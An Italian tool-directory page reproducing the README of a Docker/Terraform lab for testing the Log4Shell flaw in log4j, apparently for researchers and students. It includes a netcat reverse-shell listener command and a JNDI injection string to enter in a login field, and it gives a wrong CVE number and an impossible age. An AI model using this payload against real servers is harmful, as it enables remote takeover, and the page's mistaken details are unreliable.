Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/z3bul0n/log4jtest
Sicurezza dell'Infrastruttura CloudSicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e Formazione
GitHubz3bul0n/log4jtest

log4jtest

Terraform e risorse Docker per avviare rapidamente un test di CVE-2021-44428

Vedi Repository
14 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Introduzione

Questo repository è configurato per testare rapidamente la vulnerabilità log4j utilizzando Docker e Hashicorp Terraform. Tutti i componenti di questo test verranno eseguiti in container Docker sulla rete Docker, accessibili tramite 'host.docker.internal'.

Crediti / Disclaimer

Questo ambiente di test deriva da un ottimo post sul blog di Raxis: (https://raxis.com/blog/log4j-exploit)

L'applicazione vulnerabile e il codice dell'exploit provengono da cyberxml (https://github.com/cyberxml/log4j-poc).

Tutto ciò che ho fatto è stato codificare l'ambiente per renderlo facile da avviare e testare questo delizioso exploit.

Non mi assumo alcuna responsabilità per effetti avversi o azioni dannose che potrebbero derivare dall'uso del materiale in questo repository. Punto e basta. Sta a te decidere se questi materiali sono affidabili ed è ugualmente tua responsabilità utilizzare queste informazioni in modo etico. Pubblico semplicemente queste chicche così che ricercatori, studenti e professionisti della sicurezza possano creare rapidamente un ambiente e testare l'exploit da soli. Seacrest out.

Prerequisiti

  • Docker Desktop (https://www.docker.com/)
  • Hashicorp Terraform (https://www.terraform.io/)

Configurazione

  1. Clona questo repository
  • Esegui 'terraform init' nella directory del progetto
  • Avvia il daemon Docker
  • Esegui lo script bash 'docker-build.sh' per creare tutte le immagini dei container del progetto.
  • Esegui 'terraform apply' per creare tutti i container nel progetto.
  • Sfruttamento

    1. Accedi alla shell del container log4j_netcat usando 'docker exec -it netcat /bin/bash' o qualcosa di simile. È qui che riceverai la tua connessione shell al server vittima una volta stabilita.

    2. Nella tua sessione all'interno del container log4j_netcat, inserisci il seguente comando per avviare il listener:

    root@kitploit:~
    nc -lv -s 0.0.0.0 -p 9001
    
    1. Nel tuo browser, vai su http://host.docker.internal:8080/log4shell/

    2. Inserisci quanto segue nel campo 'Username' insieme a qualsiasi cosa tu voglia nel campo 'Password':

    root@kitploit:~
    ${jndi:ldap://host.docker.internal:1389/a}
    
    1. Torna alla shell del container log4j_netcat e osserva che ti sei connesso al server vittima.

    2. Vai e semina il caos!

    Scarica lo strumento